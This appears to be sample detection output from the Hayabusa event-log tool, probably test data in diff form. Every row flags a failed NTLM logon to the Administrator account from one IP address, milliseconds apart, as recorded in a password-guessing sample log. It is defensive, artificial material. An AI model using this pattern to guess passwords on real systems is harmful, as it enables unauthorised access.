+2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PehzjCnK42ZPUE7e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1fqw2GWiYfO0kU83 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WFPJJNCFdPJl4igl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zc6CrAr7YoozKB6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xHXminAIeV4ZJIK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 06YmUCHNZqbaZMdZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fYoENCtP2uPy9xNh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TRJRuXJTTH1afAfH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MpnkzTlc3Uvj3hpY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oIuD8haFzR8P87rL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XL1IreMAiE564NXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vMUiCaMGBC46MnPJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MOSWbwooyb60LExG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oSDNF7s3vbtkZIOz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JBMk0qOV6237XtK3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j41R1U1tYPvApCkZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcPkVZSeg5VwChW8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aDLxt5gaFDTKsiVl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94JvBKdxJkawQQMT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KgBMk00K3iC1GQem | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XdGOj9Ybm6bcCo3p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: by6F4YKorxhp5ahn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b1G6ZOgOaV6luDQN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qqSwNfvpPLQd6ZH1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mxtJJj54xSzHibHI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Y3yznfdaZ7dtwDO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: esllFn4asbLxwkBu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Pr0cgd6cF5ukhZ8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pS2fabTrbl6rZ1NB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FkylDDmUyuT57HdH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Aqs8rSvuLAQuhfDp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KI07KTgBJc4kBSKY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Re3n3nJ8EEhRRT3G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BzspAC3z1csEn0Ve | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tpkb6bf42SLUst3z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1F5d2wn60OgAExW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bhPNRHWhTyonDPuA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zEsnyWpUuHVBo6et | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I2FwaWy9TALkk9eU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fuikeQsxlOUVifVj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZWdsRJp9fHypPI1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B0j0IBX2eZnx99n9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YIZ5Knxg0xr0WmDb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wuej3f7mEoWmd4SX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B0LcCi06ilIhFPwb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jWsCGgoFmH06rRf4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bP47JjNKqtYIZPsC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mNlWZ9o0xf7bl2d0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnPnB2lEN3BSDpXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dVMyeF9jGuzHkTHg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sDKLl3PjW2qrzJGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rkllnePSq3NQ5wgC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9qLWgQnR7P9cs7s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C1AdU07nzvv7RB2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cHgiB5SMiQtsl5oD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 03e7QOn36l0jH35H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DoJBywV8x8cURwrO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SDYGYO6s6g6Dbx8r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nUqXpeTNePFyBmCo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T2h0qJWcbzRe1GSj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: edsfNOovOl1Ow503 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cxCC83XLMIJrNMvl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MzussOcg5ihdrnD0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 55l4HKICu8x0FpQv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.891 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5GmlVWDjZ75tT08G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6v1DkuFvB04PESQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:42.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VTLdNb0XbzXuLi51 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CSjDYb1BhHC9UTxO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.054 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1yLH19VsfLx9BGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X4AVhjdz9yHsfss0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bqWLOKaKwS8VBxDj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EjK8A8DTSYursBzj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.225 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UaDCKPslwRaLBWtH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:43.274 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xAvoekviFDSAIgBe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
